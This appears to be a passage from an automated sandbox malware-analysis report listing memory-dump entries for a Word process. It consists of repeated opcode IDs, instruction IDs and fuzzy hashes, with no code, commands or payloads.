                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9N_^
                                                                  • API String ID: 0-1737749909
                                                                  • Opcode ID: 27bee95fb4b38e0f44446fef163c2f6299dde7155a178c845895757eb360a01e
                                                                  • Instruction ID: 603dd5e6a71dcfc5bb154574ed6588d4fa711b029091201b901e5982e6d08c70
                                                                  • Opcode Fuzzy Hash: 27bee95fb4b38e0f44446fef163c2f6299dde7155a178c845895757eb360a01e
                                                                  • Instruction Fuzzy Hash: C9616D65E8952A8BE741BBBCE4199FC7BE0EF85329B148176C00EC7397CD28B48587D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4N_^
                                                                  • API String ID: 0-2516135240
                                                                  • Opcode ID: 9d092b149a763e2a71645f8a9aff9ecd6a4032a7185f0af47b1a0dcb0e812a45
                                                                  • Instruction ID: b70401b7ec5f5f29c77fd346d8dbf3891bbc79c0b62fbd564cc3bd3575f42d3a
                                                                  • Opcode Fuzzy Hash: 9d092b149a763e2a71645f8a9aff9ecd6a4032a7185f0af47b1a0dcb0e812a45
                                                                  • Instruction Fuzzy Hash: 3C511961A0E6960FE396A73CD8696B57FD5DF87224B0940FBD08DC72A3DC1C9C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^
                                                                  • API String ID: 0-1347224999
                                                                  • Opcode ID: f6f2bb7d624fc1346c6acbfdb32d0ec38e67425b913e9de5e9246ec39257f8a8
                                                                  • Instruction ID: 3db106f4a90122078942e0cc8e5cecb77c186753a599c58ee152f84be8d7a235
                                                                  • Opcode Fuzzy Hash: f6f2bb7d624fc1346c6acbfdb32d0ec38e67425b913e9de5e9246ec39257f8a8
                                                                  • Instruction Fuzzy Hash: 0E413725E8D6998FE342FB7CD8A59E93FE0EF85208744C0F6D44AC73A7DD28A4458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 12321e705831df9288f85e0c7e969ae87ee787d45e67dc42ac009a4d363fa534
                                                                  • Instruction ID: 1b1270c3ccfa72c46eda488783d5c04519f2c3cc5ee46c0483ffcf7ac00179e8
                                                                  • Opcode Fuzzy Hash: 12321e705831df9288f85e0c7e969ae87ee787d45e67dc42ac009a4d363fa534
                                                                  • Instruction Fuzzy Hash: 7F31F561B1C9584FE798E77CD85AB78B6C6EB99315F0405BEE04EC32A3DD249C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction ID: 84dc39e15fa4c5ceabd0d4c7761664e5b71e4d181e851cd8d9663ce5c3be1cb0
                                                                  • Opcode Fuzzy Hash: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction Fuzzy Hash: F231F652B19A194FF784B7BC981EBBDBAD1EF99310F14417AE00DC3292DD289C418781
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction ID: 2fecf18e6b7eef6d6c583994f4b81d2a32ba8c64a8fa9fcb0cca17f9ba4abb60
                                                                  • Opcode Fuzzy Hash: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction Fuzzy Hash: 7B41F76798C6664BE241BBBCF4798FA7BD0DF412397088177D18DC96A3EC1474898BC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 315b72a6b1b79f36f0dde3f8571fa89cd5b674fa15afae368cbff5b2f9f39834
                                                                  • Instruction ID: 32bd054af8aa3619d124b61449c7d2073138dcca3fe1f584454585773b8ef617
                                                                  • Opcode Fuzzy Hash: 315b72a6b1b79f36f0dde3f8571fa89cd5b674fa15afae368cbff5b2f9f39834
                                                                  • Instruction Fuzzy Hash: 5721F66284E7954FE342A7B8D8798E97FB0AF42214B0881B7C08DCA1A3EC1864498795
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69abf20bf585da4d567512df8572bd82451c7277e70146279c7e05404d177e83
                                                                  • Instruction ID: 1de00ae8cf58ee61e649d9256efe12a6748cec70335acd63c479f6a8b32471e0
                                                                  • Opcode Fuzzy Hash: 69abf20bf585da4d567512df8572bd82451c7277e70146279c7e05404d177e83
                                                                  • Instruction Fuzzy Hash: 9DA14B27B486668FD701BB7CE855AE97BE0EF85375B048177C14ACB293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a6669132b3aeca83fb526c0c709e3958951da958ece32dc01e9000d49d9c633
                                                                  • Instruction ID: b603b2817c541d84b37bdd4c331fa8429f914af44e9f913449bfa3024ded1bf6
                                                                  • Opcode Fuzzy Hash: 0a6669132b3aeca83fb526c0c709e3958951da958ece32dc01e9000d49d9c633
                                                                  • Instruction Fuzzy Hash: 14914A26B889268BD740BB7CF819AE97BD0EF85375B048577C24ECB293C924648687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d490106021536439218aecd9fb8edaf9c8a0d025db1c7643cde543d1b307144a
                                                                  • Instruction ID: 1151a3e4f1b35819f42b4a69c3577608466bfe559e6fac25311d1e83d4974a69
                                                                  • Opcode Fuzzy Hash: d490106021536439218aecd9fb8edaf9c8a0d025db1c7643cde543d1b307144a
                                                                  • Instruction Fuzzy Hash: 91816B26B889268BE741BB7CF819AE97BE0EF85375B148577C14EC7293C9247486C7C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5176a934b228763abaf32df3b8bfb67446b9525c91aa226f7d10e35e0d7ccbb
                                                                  • Instruction ID: 83d5616af7d86e243bcfdd215a25e39ae3256e62a41ed8c5fcb14d16244c8a28
                                                                  • Opcode Fuzzy Hash: e5176a934b228763abaf32df3b8bfb67446b9525c91aa226f7d10e35e0d7ccbb
                                                                  • Instruction Fuzzy Hash: 3A816A26B889268BE740BB7CF819AE97BE0EF85375B048177C14EC7293C9247486C7C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 475fc107df324f001e86c19cd29cf063de18b3f3906576776284fdcd377c9f18
                                                                  • Instruction ID: e0ec925d0142822cb1aa75685ce1e90be696d218437a14904c0d20de4a47d5de
                                                                  • Opcode Fuzzy Hash: 475fc107df324f001e86c19cd29cf063de18b3f3906576776284fdcd377c9f18
                                                                  • Instruction Fuzzy Hash: 1E715926B889268BE740BB7CE819AE97BE0EF85365B148177C14EC7293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 890c6af1db8ee8f1c70c7c37c3e2b46c96d6e9b129551778fc189beefac7eb09
                                                                  • Instruction ID: 187f0985d31ee0b16a28cc0b3d97b7a3a59364d40a3f3565e278b2523f77b252
                                                                  • Opcode Fuzzy Hash: 890c6af1db8ee8f1c70c7c37c3e2b46c96d6e9b129551778fc189beefac7eb09
                                                                  • Instruction Fuzzy Hash: A1515C61E8E6898FE341EB7CD8A59E57FE0EF81208754C0F6D08AC73A7DC2894498785
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b77965bddaba7ee0e8dc0d68b8a26f046557efe9dd31cd3ce9288f6514d774ee
                                                                  • Instruction ID: c6176ab94779965cddd5a69c68bd45a7300eb7f6bf576fca70a73da250639c5d
                                                                  • Opcode Fuzzy Hash: b77965bddaba7ee0e8dc0d68b8a26f046557efe9dd31cd3ce9288f6514d774ee
                                                                  • Instruction Fuzzy Hash: 1441F570E19A5E8FEB84EB78C855AED7BF1FF99304F5040B5D00AD3296CD28A8458780
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2fa4efc1ca4e189293e2c85cdc4fb0921a598ef77ead8f22b6501e4da40ca79
                                                                  • Instruction ID: f80e9943961d626846378e80bb3fb4ec12ba4f92115194f9a5bca3cda616808a
                                                                  • Opcode Fuzzy Hash: d2fa4efc1ca4e189293e2c85cdc4fb0921a598ef77ead8f22b6501e4da40ca79
                                                                  • Instruction Fuzzy Hash: 7621B424E5D68D9FE381EB6CC4A59A97FF1AFD9204B90C0E5D40BC33ABDD2858108741
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf2ba9321790f2ec46e048642cccd2025f7bcb96281035a26f58d6790fa0ed14
                                                                  • Instruction ID: 3d6d40bac465ad5625de8b444e62f3df15808939ffaee07490c49fbe4317dbbd
                                                                  • Opcode Fuzzy Hash: bf2ba9321790f2ec46e048642cccd2025f7bcb96281035a26f58d6790fa0ed14
                                                                  • Instruction Fuzzy Hash: E101492490DBD18FF795A73848595717FE0DB92344B0804EAE88DC65D7DC08D98883C6